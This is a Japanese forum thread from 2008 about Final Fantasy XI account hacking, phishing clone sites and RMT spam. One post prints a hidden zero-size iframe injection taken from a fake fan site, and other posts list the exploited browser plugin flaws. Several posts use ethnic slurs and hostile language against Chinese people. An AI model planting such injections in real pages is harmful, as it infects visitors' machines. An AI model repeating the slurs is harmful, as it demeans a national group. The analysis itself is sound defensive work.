中国は国を挙げておおっぴらにスパイ行為やウィルスバラまきをする気満々だぜの210からあげ

676 名前:既にその名前は使われています:2008/09/19(金) 09:35:11 ID:zL52NyXZ
オンラインゲームに潜む影――あなたのキャラクターは大丈夫?(前編)
http://plusd.itmedia.co.jp/games/articles/0809/18/news077.html

677 名前:既にその名前は使われています:2008/09/19(金) 10:50:52 ID:a1QIo7yK
開示すれば間違いなく中国に逆らえばウィルスを放ってくるようになるよな。

678 名前:既にその名前は使われています:2008/09/19(金) 11:37:13 ID:iWQjCmdj
相変わらずあの国は馬鹿丸出しだな。

679 名前:既にその名前は使われています:2008/09/19(金) 11:41:37 ID:a1QIo7yK
そのうち セキュリティを守るためにATMのソースを開示せよ とか言ってくるんじゃね?

680 名前:608続き:2008/09/19(金) 12:13:18 ID:bLP/d9QW
>>611 および皆様
亀ですみません。ありがとうございます。
/seedsについては 以下の内容であってますでしょうか?

*/seedsというマルパクサイトがあった。
*Backdoor.Win32.Agent.rqkは/seedsとは関連性ない。(ハンゲスタータの誤検出で、報告済)

>>512 >>521の報告で
avast!がJS:Agent-AU [Expl]とVBS:Malware-gen検知

>>512の報告で
re11.htmが反応

>>526の報告で
偽サイトは多数のスクリプト検知

>>560 >>611の報告で(同じ方?)
NIS2008が HTTP Yahoo! Messenger CYTF Ctrl GetFile を警告
(続く)

681 名前:608続き その2:2008/09/19(金) 12:14:39 ID:bLP/d9QW
見た目がそっくり?でURLも模倣ということで
悪意を持って作られた事に間違いはないと思うのですが
MMOのアカハク目的と断定するにはちょっと材料が足りない感じです。

ソースその他具体的な判断材料をお持ちの方
日曜まで(月曜には撤収予定) ttp://ffxi■yukikuma■com/に ロダおいときますので
よろしければ圧縮してうぷお願いできませんでしょうか。
(xrea広告つきサーバ 5Mまでです。ごめんなさい。)
サイト管理人と同一人物かどうか確認が必要な場合
今日中にサイトのメールフォームからご連絡いただければ
上記ドメインのメールで返信させていただきます。
一方的なお願いでスレ汚し申し訳ありませんでした。

682 名前:既にその名前は使われています:2008/09/19(金) 12:15:02 ID:bG24+3uV
さすが中国。普通なら恥ずかしくていえないことを堂々と言ってのけるぜ。
どんだけ技術を盗み、悪用しようとしてるんだ。

683 名前:既にその名前は使われています:2008/09/19(金) 12:16:28 ID:a1QIo7yK
福田ならサラッと開示しそうだったから辞めてよかったな。

684 名前:既にその名前は使われています:2008/09/19(金) 14:04:54 ID:XLIB9MoQ
238からあげ

685 名前:既にその名前は使われています:2008/09/19(金) 15:33:32 ID:KTml9jVr
200こえたぞーagu

686 名前:611:2008/09/19(金) 16:18:46 ID:1kn7D2Kz
>>608(>>680)
>*/seedsというマルパクサイトがあった。
MMOのアカウントハッキング目的なのかどうなのかいまいち判断がつきませんが、模倣HPは存在してました
>*Backdoor.Win32.Agent.rqkは/seedsとは関連性ない。(ハンゲスタータの誤検出で、報告済)
偶然が重なっただけのようで、関連性はなさそうです。

あと、seedsに接続したときにNIS2008が弾いた侵入は

HTTP SnapShot Viewer ActiveX File Download
HTTP BlackIce ActiveX Download Activity
HTTP Yahoo! Messenger CYTF Ctrl GetFile

このみっつでした(履歴を確認してみっつ弾いてました)

>>526はわたしですが、Firefoxのスクリプト反応で、本物は4個、偽物は20個でした
わたし(>>611)は>>560さんとは別人です

687 名前:既にその名前は使われています:2008/09/19(金) 16:50:39 ID:RblufQ2J
>>675
中国何言ってんだかw

688 名前:既にその名前は使われています:2008/09/19(金) 17:32:43 ID:rm4nB2ZM
2赤でアンマリ使ってないほうのキャラで、アカハックくらったのだが、帰ってきてびっくりした。
ショボイ装備と数万のギルしかなかったんだが、3000万ギルあるぞ。
中華のギル中継に使われてたのかな〜。ボーナス付きでまじうれしい。

689 名前:既にその名前は使われています:2008/09/19(金) 17:47:53 ID:gHRDHmxy
この類の話何回目くらいだろう…20は見たよねw
って保守

690 名前:既にその名前は使われています:2008/09/19(金) 17:49:05 ID:KTml9jVr
羨ましいというより黙ってたら間違いなくBANだなーくらいにしか思わないな

691 名前:既にその名前は使われています:2008/09/19(金) 17:55:44 ID:JxCSphnP
>>688
スクエニから対応の遅れのお詫び
そう考えて俺はいただいた。

692 名前:既にその名前は使われています:2008/09/19(金) 17:57:14 ID:JxCSphnP
>>690
まじかw

693 名前:既にその名前は使われています:2008/09/19(金) 18:03:34 ID:ZdZgo8qp
ID:JxCSphnPはID:rm4nB2ZMなの?

694 名前:既にその名前は使われています:2008/09/19(金) 19:29:02 ID:qDqxOo6m
キティか業者のタゲそらしだろ
ほっときな

695 名前:既にその名前は使われています:2008/09/19(金) 19:40:31 ID:mf6Cdvub
俺はNAっぽいフレ登録されたオマケだけだったがw
中華が転売したのかな

696 名前:既にその名前は使われています:2008/09/19(金) 20:51:25 ID:P7fJg1k4
差出人が---のRMT案内メールって、昔のフレのPOLアドレス使って送られてるんだろ?
何かムカツクな

697 名前:既にその名前は使われています:2008/09/19(金) 21:10:38 ID:LvnTVfEM
ヴァナモンは安全?

698 名前:既にその名前は使われています:2008/09/19(金) 21:17:03 ID:a1QIo7yK
ネットに絶対安全なんてものはない。

699 名前:既にその名前は使われています:2008/09/19(金) 21:30:10 ID:FT/Nkaho
巻き戻し申請中でもPOLにはインできるんだよね?
POLのメールのパスワード変え忘れていたので、
POLにインしようとしたらパスワードが違うと出てくるという事は
またやられたのかな?クリーンインストールしてからFF11も入れなおして、
セキュリティソフトもPG2も入れてるのにどこでやられたのだろう・・・


700 名前:既にその名前は使われています:2008/09/19(金) 21:46:04 ID:qPpkoj2a
>>699
PG2だけなら効果は無いに等しいのでは?

701 名前:既にその名前は使われています:2008/09/19(金) 21:49:42 ID:qPpkoj2a
上に出てるギルが増えていた件はフレも言ってたよ。金額とか確認していないし。
もうログインしてこない感じだからその後は確認できないけど。


702 名前:既にその名前は使われています:2008/09/19(金) 21:51:55 ID:FT/Nkaho
いや、バスターの2008も入れてブラウザもFirefoxにしてNoScriptmeも
入れたのに。もうPC版でやるのはやめよう。360版買ってこようかな。

703 名前:既にその名前は使われています:2008/09/19(金) 21:57:31 ID:qPpkoj2a
>>702
それがおすすめだね

704 名前:既にその名前は使われています:2008/09/19(金) 22:11:28 ID:P7fJg1k4
最近はヴァナモンすら使うの控えてるな
FF用語辞典で調べ物したりしてるし
あとはElemenとかえふめもとか大手どころくらいしか怖くてつかえないな
リンクなんて何処も論外すぎてふめねー

なんなのこれフザケテルノー

705 名前:既にその名前は使われています:2008/09/19(金) 22:28:52 ID:bqFmZoA8
ヴァナモンなんて実際にハッキングされたし
大手だからって安心できるわけじゃないだろうに
FF専用マシンが絶対必要

706 名前:既にその名前は使われています:2008/09/19(金) 22:35:34 ID:P7fJg1k4
もうシナ畜糞過ぎ
死ねよ中国人…

707 名前:既にその名前は使われています:2008/09/19(金) 22:35:58 ID:urUENrtI
箱○の最適化とPS3版FF11クライアント出ればありがたいんだがな〜

708 名前:既にその名前は使われています:2008/09/19(金) 22:36:57 ID:urUENrtI
やった、規制解けた;;
sage進行は危険なのでageマスね^^

709 名前:既にその名前は使われています:2008/09/19(金) 23:07:39 ID:QlACI3qz
ハッキング復元してもらって、一週間も経たないうちにまたハッキングさ
れてしまいました。
ウインドウズのアップデートもセキュリティソフトのチェックも随時行っ
ていました。
パスワードもハッキング直後と復元後に2回変更したし、インターネット
の検索もスクウェアFF公式HPぐらいしか見てないのに、どうしてこう
なってしまうのか全く分かりません。
それにしても前回と同じく、「プレイオンラインIDまたはプレイオンラ
インパスワードが違います」というメッセージが出て、今まさにキャラク
ターを操作してお金やアイテムを競売で奪っているのを分かっていながら、
インフォメーションセンターに「時間外」という理由で連絡すら出来ない
のが歯がゆくてなりません。
復元は1度しかしか出来ないということで、もう何を言っても「終わり」
なんですけどね・・・

710 名前:既にその名前は使われています:2008/09/19(金) 23:15:36 ID:P7fJg1k4
何も原因ないわけないだろー

1.ウィルスを隔離出来てなかった
2.ブログかどっかで罠URL踏んだ

711 名前:既にその名前は使われています:2008/09/19(金) 23:15:46 ID:uTtco0tC
>>704
FF用語辞典なんて所も信用なんて無い。
ってか、ネットにつなげてる時点で、
信用なんて目の前で自分で火をつけて燃やしてるようなものだからな。

因みに俺のPCにはウイルスソフトぐらいしか入れてないけど、一度もパスなんて抜かれた事が無い。
だって。そもそもFF入ってないんだぜwwwww
回線だって完全に別さあ!今のネット社会。これぐらいアタリマエだぜ!

712 名前:既にその名前は使われています:2008/09/19(金) 23:18:56 ID:uTtco0tC
>>710の言うとおりだな。
ってか、本当に被害にあったならまずテンプレよろ。
何処が悪かったかそれでいえると思うぜ。

713 名前:既にその名前は使われています:2008/09/19(金) 23:19:49 ID:SZzJKqwv

れて
ウ  ン
て    し
パ      ド
の        ク
な          の
そ            回
イ              違
タ                や
イ                  ン
の                    ん
復                      い




改行が変だったから見てみたけど、縦でも斜めでもないようだ

714 名前:既にその名前は使われています:2008/09/19(金) 23:24:38 ID:SPGdggI/
どうせまた、実はクリリンしてないwとか、FlashPlayer最新w(のつもり)とかだろ

715 名前:既にその名前は使われています:2008/09/19(金) 23:36:17 ID:t8Qk5HO1
>>713
おまえ無駄なことに労力かけるなよ・・・w
それはともかく隔離せずアップデートやらしたって無駄だわなぁ

716 名前:既にその名前は使われています:2008/09/19(金) 23:50:29 ID:bqFmZoA8
>>709
マズお前は間違いなくHDフォーマット・PCの初期化を怠っていたろう?
そしてパスワードも相変わらずPCに保存していたんだろう

717 名前:既にその名前は使われています:2008/09/19(金) 23:50:33 ID:mf6Cdvub
HDDとっかえた俺最強

718 名前:既にその名前は使われています:2008/09/19(金) 23:50:35 ID:MqeFg/Eh
どーせクリーンインスコもしてなくて 大丈夫^^ とか自分に言い聞かせたんだろうな。


719 名前:既にその名前は使われています:2008/09/20(土) 00:04:02 ID:C/i18cyW
おやすみ前のあげ。

720 名前:既にその名前は使われています:2008/09/20(土) 00:20:31 ID:uY1ubo99
被害者に冷たいスレになりました

・・・いつものことか

721 名前:既にその名前は使われています:2008/09/20(土) 00:22:26 ID:1r73rTCq
一回目は仕方ないにしても二回目はな

722 名前:608,680続き 1/2:2008/09/20(土) 00:22:28 ID:H+6B+i3P
ソースを上げてくださった方 ありがとうございます。
<!--履歴-->というコメントアウトの後</tr>と<td>の間に
<iframe width='0' height='0' src='http://www●geocities●jp/ff11seeds/gei.htm'></iframe>
というサイズ0のiframeがありました。

>>686さんのエラーメッセだと
Microsoft Access の脆弱性
http://www.microsoft.com/japan/security/bulletins/ms08-041e.mspx
BlackIceの脆弱性(なんでしょこれは IBMが昔出してたファイアウォールくらいしか思いつかないw)
を利用して ヤフメッセで送らせるって感じみたいですね。

RealPlayerの識別子があったというre11.htmはgei.htmに読み込まれてたのでしょうか。
indexページはオリジナルのソース丸パクで上記のiframeと自動挿入部分以外の相違点が見つからなかったので
思いつくのはcssファイルに仕込まれてた可能性くらいですが
どのようにして Atlas/re11.htmに飛ばされたのか気になります。
引き続き情報募集中です。
ジオ関連で補足続きます。

723 名前:既にその名前は使われています:2008/09/20(土) 00:24:07 ID:reZ+om+R
クリーンインストールしてなさそうだし、冷たくされてもしょうがない^^

724 名前:2/2:2008/09/20(土) 00:32:01 ID:H+6B+i3P
補足
ジオは自動挿入されるアクセス解析と広告にJSを使ってます。
ブラウザからソースをとると元サイトの広告と解析がはいります。
<!-- text below generated by server. PLEASE REMOVE --> ってコメントアウトされてるところです。
そのソースをそのまま偽サイトにアップしているので 偽サイトの分も自動挿入が入ってるんですね。
で 上部にはバナー広告2個分のスクリプトがあります。
いったんうぷって またブラウザからソース取った可能性もありますが
オリジナルの<body>位置が</head>より前にあるため自動挿入がバグってるのかもです。
下にアクセス解析3つ。これは広告に対応した数。
なのでスクリプト数はオリジナルよりかなり多くなっているわけです。

ジオのアカウントは同名のヤフーのアカウントがあると作れません。
ジオの/seedsというURLはヤフーのseedsというIDに優先権があります。
つまりヤフーのIDとしてまだ生きているseedsというアカウントを持っている人もしくはそのアカウントをハックした何者かが偽サイトを作りました。
最近は削除されてないので不明ですが以前は同一のURLを再使用することはできなかったかと思います。
ですが生きているIDなので今後ジオで別のサイトを作ることが可能です。コワス



725 名前:既にその名前は使われています:2008/09/20(土) 00:33:58 ID:aKcw1mT6
POLの起動時と終了時のエラー
Winアップデートできない
シャットダウンにえらい時間かかる
とかの症状なくてハック来た人っているの?

726 名前:611:2008/09/20(土) 00:34:09 ID:uY1ubo99
>>608(>>680>>722)

IFRAMEを見つけたのがジオに削除依頼をしたあとでしたので
gei.htmを確認しようとしたときは消されちゃってました・・・

なにぶんわたしのところには「感染しても安全な環境」がありませんので
もう侵入検知でてんぱっちゃって、わ〜わ〜あたふたしてましたから
適切な対応ができていなかったことをお詫びしておきますm(_ _)m

727 名前:既にその名前は使われています:2008/09/20(土) 00:37:38 ID:uY1ubo99
>>725
wzcsvbxm.dll ← こっちのウィルスは前兆現象が出るようですけど
Kernaeghdrv.dll ← こっちのほうはFFに関しては前兆現象は報告されてないと思います

728 名前:既にその名前は使われています:2008/09/20(土) 00:40:47 ID:Y6oHQQsn
2回目やられたひとはとりあえず2回目以降も復旧してもらえるように要望メール出したらいいんじゃないの
素人考えだけど復旧するには人件費が結構かかるはずだから「有料でもいいです」とか書き添えてさ

729 名前:既にその名前は使われています:2008/09/20(土) 00:45:07 ID:70xkkVug
flash player10を薦めている人がいる
英語なのに大丈夫かな

730 名前:既にその名前は使われています:2008/09/20(土) 00:55:53 ID:uY1ubo99
>>729
Flash Playerの10って確認できないんですけど、出てます?

731 名前:既にその名前は使われています:2008/09/20(土) 01:02:24 ID:H+6B+i3P
>>726 
私は個人的興味ってスタンスですし。
お詫びなさるようなことはなにもないかと。

サイトを丸パクするのは実はとても簡単なことなので
FF11のアカウントの問題としてだけではなくインターネットをする上で
丸パク+リダイレクトや罠スクリプトという実例を多くの方に知っていただけるということに意義があると思います。
なんかこいつエラソウなこといってますが【許してください。】 
今日は上げて寝ます。おやすみなさい。



732 名前:既にその名前は使われています:2008/09/20(土) 01:03:28 ID:H+6B+i3P
っと おまけ
FP10は ラボで落とせたかと。
安定版のリリースはまだじゃないでしょうか。

733 名前:既にその名前は使われています:2008/09/20(土) 01:08:52 ID:uY1ubo99
>>732
ありがとうございます
ラボで確認しました

734 名前:既にその名前は使われています:2008/09/20(土) 01:17:11 ID:QLMWPXsl
業者の宣伝メッセが来たって人、けっこういるのかな?今日俺んとこにも来たんだが。
差出人が「---」みたいになってた。
試しに自分のフレ宛にメッセを送る画面を開いて、自分の名前を「---」に変更しようとしたけど
出来なかった。
最近インしなくなったフレがいるんで、そいつがハクられて経由してきたのかな〜。
こっちがフレ削除しても向こうが消さない限り送られてくるのかな。
防ぎようがなくて気持ち悪い。

735 名前:既にその名前は使われています:2008/09/20(土) 01:25:25 ID:JlQLP77e
巻き戻しは1回限りだけど、アカウントの復帰は対応して貰えるのだよね?
巻き戻し中でよかったと考えるべきか。

736 名前:既にその名前は使われています:2008/09/20(土) 01:29:22 ID:cL3rl5vZ
>>734
ハックした奴のアドレス帳(フレ登録者)勝手に辿って
ダイレクトメール送ってくるのかw
フレをハックした奴からそんなもん送りつけてくるとかwwww
喧嘩売ってるか以前にまともじゃないよ、中華。

POLどっかやられたのかとおもったらそういうことなのか。

737 名前:既にその名前は使われています:2008/09/20(土) 01:46:51 ID:QLMWPXsl
>>736
>>226を見て、フレ経由なのかと想定。
別ハンドルの倉庫キャラにはメッセきてないんで、可能性高いかなと。

フレ経由で合ってたとしても、差出人名がへんてこな文字列になってたのは絶対変だよな。
一応STTには報告してみるか。

738 名前:既にその名前は使われています:2008/09/20(土) 02:18:54 ID:zw76i3zp
自分のとこにもきたけど、POLの自キャラ名と違うハンドル名の方にだけ
送られてきているからハックされたフレリストとかではなさそう。
もちろんそのハンドルでPOL上で他人とやり取りしたことはない。
業者はアドレス解析して送ってきてるんだと思う

739 名前:既にその名前は使われています:2008/09/20(土) 02:22:40 ID:zw76i3zp
GMコールしてみたところ
「フレンド登録メール送信の際にコメントを書き換えて送ってきている」
というような返信があった

740 名前:既にその名前は使われています:2008/09/20(土) 02:36:53 ID:uY1ubo99
フレ登録から送ってきてるなら、それだけハックされた人が多いというか
ハックされて泣き寝入りしてる人が多いというか、そういうことなのかな

741 名前:既にその名前は使われています:2008/09/20(土) 02:44:48 ID:WFcHy96Y
>>675の件。FFとは直接関係なさそうだが、チャンコロのメンタリティがよくわかる事例だと思う。
【国際】 「IT製品、ソースコード開示せよ」…中国が外国企業に要求へ★5
http://mamono.2ch.net/test/read.cgi/newsplus/1221836695/8

8 名前:名無しさん@九周年[] 投稿日:2008/09/20(土) 00:08:06 ID:+5EbIvak0
別ソース
http://www.csaj.jp/government/other/2008/080627_meti.html

社団法人コンピュータソフトウェア協会(CSAJ)のソースなので
ほぼ一次ソースだと言えます。

ちなみに対象の詳細です
http://www.csaj.jp/government/other/2008/080627_list.pdf


742 名前:既にその名前は使われています:2008/09/20(土) 02:45:34 ID:WFcHy96Y
対象の詳細↓

ファイヤーウォール
ランカード及びスイッチングハブ
VPN
ルータ
インテレジェントカード
ICチップ用OS
バックアップ及びリストアデータ
OS
データベースシステム
迷惑メール防止システム
不正アクセス侵入探知システム
ネットワーク監視システム
ログ収集、解析ソフト
ファイル改竄探知システム

どうみても不正アクセスする気満々です。本当にありがとうございました


743 名前:既にその名前は使われています:2008/09/20(土) 02:51:03 ID:uY1ubo99
>>741
ナマ貼りはよくないですよ
とくにPDFは安全が確認できないから開くのが怖い

744 名前:既にその名前は使われています:2008/09/20(土) 02:52:44 ID:WFcHy96Y
>>743
いいたいことはわかるけど、これぐらいはアドレスみて判断してくれよ・・・


745 名前:既にその名前は使われています:2008/09/20(土) 02:55:05 ID:uY1ubo99
>>744
そこが安全だと「あなた」が保障してくれるなら?

746 名前:既にその名前は使われています:2008/09/20(土) 02:57:24 ID:WFcHy96Y
ただのバカだった。

747 名前:既にその名前は使われています:2008/09/20(土) 02:58:02 ID:VfncLR3v
どっちも馬鹿だー

748 名前:既にその名前は使われています:2008/09/20(土) 02:58:16 ID:uY1ubo99
>>746
わたしはITMediaのニュースでさえナマ貼りは控えてますよ
なにが安全かがわからない状況になってきてますから、ナマは控えて
いただいたほうがいいと思います

749 名前:既にその名前は使われています:2008/09/20(土) 03:02:28 ID:WFcHy96Y
>>748
たぶん言ってもわからないだろうけど、最後にいっとくね。
CSAJソースと、ITMedia程度を比較しないでね。

750 名前:既にその名前は使われています:2008/09/20(土) 03:05:13 ID:uY1ubo99
>>749
だから、そういうあなた的視点の考え方が危ないと言っているんですけど
そこを話してもわからないようですからわたしもやめときます

751 名前:既にその名前は使われています:2008/09/20(土) 03:09:51 ID:VfncLR3v
もうやめて><


752 名前:既にその名前は使われています:2008/09/20(土) 03:11:41 ID:Pgp5fgQU
もうやめてー><

753 名前:既にその名前は使われています:2008/09/20(土) 03:20:51 ID:0yj/nKdl


754 名前:既にその名前は使われています:2008/09/20(土) 03:30:58 ID:dsQbmc5g
すべての人間がアドレスで判断できるとは限らないですよ
似たアドレスの罠サイトを踏まされる可能性もあるわけですし
>>744は自分基準で思いやりの欠片もないように見えました
垢ハクスレでは他に比べて特にみんな敏感になっているから直アドは自重するのがおすすめかもw

755 名前:既にその名前は使われています:2008/09/20(土) 03:32:46 ID:uY1ubo99
ジオサイトの偽物騒動があったばかりです
ナマ貼りが安全だという認識をほかに与えないようにしてください
「www.csaj.jp」が安全だという思い込みがあると、www.csajs.jpとか
「www.csaj_.jp」とか似せたURLが出てきたときに、それも安全だと
クリックしてしまう可能性は否定できません
テンプレには外部URLを踏むのは自己責任だと書きましたが、わざわざ
罠を作る(あるいは作らせる)必要はないと思います

756 名前:テンプレ改定:2008/09/20(土) 03:35:35 ID:uY1ubo99
■被害報告をされる方は被害報告用テンプレに沿って書き込みをお願いします
■外部リンクのナマ貼りは控えてください(偽物サイトへの誘導もありますので、飛ぶときはURLの確認を怠りなく)
■このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
  ・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
  ・使用ブラウザのスクリプト実行を不許可にすることをお勧めします
★前スレ ●● RMT業者の垢ハックが多発している件39 ●● http://changi.2ch.net/test/read.cgi/ogame/1220731476/l50

■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
   不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
   受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
■テンプレ = ttp://www.geocities.jp/ff11warning/template/ (ttp://miku.xrea.jp/template/のミラーサイト)
  「一般テンプレ」に関してはこちらのサイトをご覧ください
■まとめサイト
FF11Warning(垢ハックについての対策とか詳しく載ってます)= ttp://miku.xrea.jp/
     (xreaが不安な人はミラーサイトへ = ttp://www.geocities.jp/ff11warning/)
FFIX Virus問題 まとめサイト(初心者さん向け)= ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
【FF11】アカウント不正ログイン被害まとめ(スレNo.20以前の過去ログあり)= ttp://ort.sakura.ne.jp/taisai/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
  勇気がなくて踏めない人のための鑑定スレPart18 http://pc11.2ch.net/test/read.cgi/hack/1208760889/
  ※専ブラで画像を先に読み込む仕様になっている場合は設定を変えてください(jpg偽装のウイルスとかも鑑定されているようです)

757 名前:既にその名前は使われています:2008/09/20(土) 03:45:49 ID:P0ah4yVS
>>730
英語のRC版なら最近。
正式版じゃないからAdobe Labsページから。

ベータ/RC版をすすめるやつもどうかしてると思うけどね。
単に無責任な新しもの好きなだけか。

758 名前:既にその名前は使われています:2008/09/20(土) 03:49:43 ID:qIHQ0Rx3
ナマ貼りなんてオレ用語をテンプレに含められても困る。
脊髄反射で事を起こすにしても、もうちょっと推敲してからにしてくれ。

759 名前:既にその名前は使われています:2008/09/20(土) 03:51:18 ID:g1Lnq5sv
普通なら「直接リンク」「直リン」だよねぇ、表現としては

760 名前:テンプレ改定:2008/09/20(土) 03:58:43 ID:uY1ubo99
■被害報告をされる方は被害報告用テンプレに沿って書き込みをお願いします
■外部リンクをそのまま掲載する(直リンクを貼る)ことは控えてください
  ・似せたURLで偽物サイトへの誘導もありますので、外部リンクを踏むときは注意してください
■このスレで紹介されるURL(外部リンク)を踏むのは、すべて自己責任でお願いします
  ・Windows及びFlashPlayerなどのソフトが最新の状態であることを確認してください
  ・使用ブラウザのスクリプト実行を不許可にすることをお勧めします
★前スレ ●● RMT業者の垢ハックが多発している件39 ●● http://changi.2ch.net/test/read.cgi/ogame/1220731476/l50
■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
   不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
   受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
■テンプレ = ttp://www.geocities.jp/ff11warning/template/ (ttp://miku.xrea.jp/template/のミラーサイト)
  「一般テンプレ」に関してはこちらのサイトをご覧ください
■まとめサイト
FF11Warning(垢ハックについての対策とか詳しく載ってます)= ttp://miku.xrea.jp/
     (xreaが不安な人はミラーサイトへ = ttp://www.geocities.jp/ff11warning/)
FFIX Virus問題 まとめサイト(初心者さん向け)= ttp://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
【FF11】アカウント不正ログイン被害まとめ(スレNo.20以前の過去ログあり)= ttp://ort.sakura.ne.jp/taisai/
★そのサイトが安全かどうかの鑑定が欲しいかたは↓に行ってください(このスレでの鑑定依頼はNGです)
  勇気がなくて踏めない人のための鑑定スレPart18 http://pc11.2ch.net/test/read.cgi/hack/1208760889/
  ※専ブラで画像を先に読み込む仕様になっている場合は設定を変えてください(jpg偽装のウイルスとかも鑑定されているようです)

761 名前:既にその名前は使われています:2008/09/20(土) 04:00:20 ID:0yj/nKdl
生生うるせーな馬鹿じゃねーの
たかだかh取る取らないでうるせーんだy

Jane使ってコマンドに
http://www.aguse.net/result1.php?url=$LINK
でも入れてろよ

762 名前:既にその名前は使われています:2008/09/20(土) 05:38:22 ID:uY1ubo99
203からあげ

763 名前:既にその名前は使われています:2008/09/20(土) 05:49:03 ID:gZutXPqa
一度ハッキングされても、その後のPOLIDはそのまんまだよね?
だとしたら、簡単なパス変更だと力技(数打ちゃ当たる方式)で破られてるってことはない?
ツ−ルとかあるかは知らないけどさ(3回打ち間違えたらロック掛かるとかなかったよね?)

仮想化して、FFとブラウジングとで切り分けするしかないかな

764 名前:既にその名前は使われています:2008/09/20(土) 06:17:31 ID:fH9tjXTX
怖かったのでPG2導入しました;;
難しかったです;;

765 名前:699:2008/09/20(土) 06:45:41 ID:zPGII5gj
パスワードを再発行してもらって、ソフトウェアキーボードで入力し
POLに接続。パスを数字、小文字、大文字の合せて15桁に変更。
キャラの被害確認してPOL落ちる前に再度パス変更。
巻き戻し依頼して昨日、POL入ろうとするまで一度もPOLには
繋いでいなかった。
巻き戻し完了のメール連絡は着てないけど、公的書類送って3週間は経つから
念のため再度新しいパス発行してもらうまで、アカウント凍結して貰ってた方が
いいのかな。




766 名前:既にその名前は使われています:2008/09/20(土) 07:11:34 ID:OhLV2mId
防げるのはキーロガーだけ
それ以外のウイルスに感染してるならIDとPassは海の向こうに行った。

767 名前:既にその名前は使われています:2008/09/20(土) 08:00:50 ID:m0S/8ikW
昨夜からなんか頻繁にPG2がブロックしてるんだが・・・なんなんだろう
58.19.24.200
60.190.218.40
61.191.58.178
124.49.93.220
124.90.200.158
124.115.211.22
218.15.62.78
221.0.186.14
222.187.221.86

768 名前:既にその名前は使われています:2008/09/20(土) 08:14:48 ID:SKfVvAjV
aguseで見てみただけだけど中国の色んな所からだねw
韓国が1個だけまじってたけど


769 名前:既にその名前は使われています:2008/09/20(土) 10:08:41 ID:2/F0O9/a
216

770 名前:既にその名前は使われています:2008/09/20(土) 10:44:14 ID:uuoQ1brA
夜中にくだらないことで言い合いをしてたと思ったら、それで一人で盛り上がって
勝手にテンプレ改訂かよ。しかも改定案じゃなくて、改訂決定。バカなの?死ぬの?

771 名前:既にその名前は使われています:2008/09/20(土) 10:48:11 ID:474D43d7
ナマ貼り云々言ってる人って専ブラ使ってないの?
Janeだと頭のh抜いたってリンクされるんだが

772 名前:既にその名前は使われています:2008/09/20(土) 10:49:35 ID:B3lJNa5r
差出人---のメッセージのことだけど
POL上から適当に探して送って
あと、その送った時に使ってたハンドルを削除したらそうならない?

773 名前:既にその名前は使われています:2008/09/20(土) 10:53:11 ID:k/XTQ6yf
>>734みたいな宣伝メールがうちのとこにも
例のごとく差出人が----で英文だた
無差別っていうか全ユーザーに送ってるんかな

774 名前:既にその名前は使われています:2008/09/20(土) 11:18:43 ID:aBbuG4nn
2垢もってるけどそーいうメルは来てないな〜
ただフレが少ない上に全員PS2使いだからかもしれんけどw

775 名前:既にその名前は使われています:2008/09/20(土) 12:51:37 ID:2xSQoEPW
保守

メアドは変更しても届くの?変更してないから届くの?

776 名前:既にその名前は使われています:2008/09/20(土) 13:42:38 ID:QLMWPXsl
>>772
なるほど〜。
その方法なら自分でも確認できるけど、やり方わかったところで根本的な解決にならないからなあ;;

>>774-775
メールじゃなくて、フレンドメッセージです。

>>773
こっちがハンドル変更したりフレ削除しても、向こうが登録してる限りオフラインでリストに載った
ままになるんだっけ?
誰ともフレ登録してない倉庫キャラに届いたという話も出てたので、無差別かもしれないし、防ぎ
ようがなさそうだなあ。
気持ち悪いだけで実害はないけど、なんかやだよね。

777 名前:既にその名前は使われています:2008/09/20(土) 14:47:55 ID:zw76i3zp
>>776
自分のとこにきたヤツの宛先が、自キャラとリンクさせてないPOL上だけのハンドルへだったので
ヴァナ上のPCに対してではなくPOLのアカウントに対して送ってきてるんだと思う
>>774
フレ登録申し込んだときに相手に「フレンドになろうよ!」って送られてくるコメントを
ああいう風に書き換えているわけ
おそらくツールでハンドル名ランダム総当りで探り当てて送信して言ってるんだと思う

778 名前:既にその名前は使われています:2008/09/20(土) 15:29:34 ID:tl65gxHd
ランダムなら18ハンドル作ってる俺んとこにも届きそうなもんだけど来てないよ

779 名前:既にその名前は使われています:2008/09/20(土) 15:43:40 ID:zw76i3zp
>>778
単に見つけられてないだけだろう
業者向こうの人間だから、向こうにわかるような名前とかでないとでてこないんじゃないかな

780 名前:既にその名前は使われています:2008/09/20(土) 16:35:50 ID:TzmYYGK1
ABCD1234みたいなデフォの奴に送ってんじゃね?

781 名前:既にその名前は使われています:2008/09/20(土) 17:11:25 ID:znu3xel5
以前、リンクシェル絡みで何か流出してなかったっけ?

例のオークションサイトのキャラ詳細みたいなのもどうやって抜いて?るんだろ
本人が登録してるのかな
フレのキャラ名のリンクまである

782 名前:既にその名前は使われています:2008/09/20(土) 17:29:45 ID:reZ+om+R
259からあげ


783 名前:既にその名前は使われています:2008/09/20(土) 18:39:06 ID:20ELIdSw
202から上げ

784 名前:既にその名前は使われています:2008/09/20(土) 19:43:35 ID:x8clkbxd
age

785 名前:既にその名前は使われています:2008/09/20(土) 20:45:39 ID:aBbuG4nn
上へ参りまぁす

786 名前:既にその名前は使われています:2008/09/20(土) 20:50:33 ID:4JkEBbda
知り合いがアカハクくらったので代理でGMコール
FF内からコール>「最終ログイン時間と全てのキャラ名、ワールド添えてPOLからコールしてください」
情報添えてPOLからコール>「最終ログイン時間が日と曜日しかないので判断できません」
POLから再コール>凍結しました、と一方的に通知が来て終了

長い時間まったんだから、日付くらい確認しにチャットに応じてくれてもいいと思うのだが…。

とりあえず代理コールはこんな感じでできた。

787 名前:既にその名前は使われています:2008/09/20(土) 20:52:02 ID:1r73rTCq
>>786
乙だけど本人確認の条件はあんまりここに明記しないほうがいいかもだ

788 名前:既にその名前は使われています:2008/09/20(土) 21:14:42 ID:3LfsuaJ5
RMTメッセは、POLサーチでAから順番に送ってるだけじゃない?
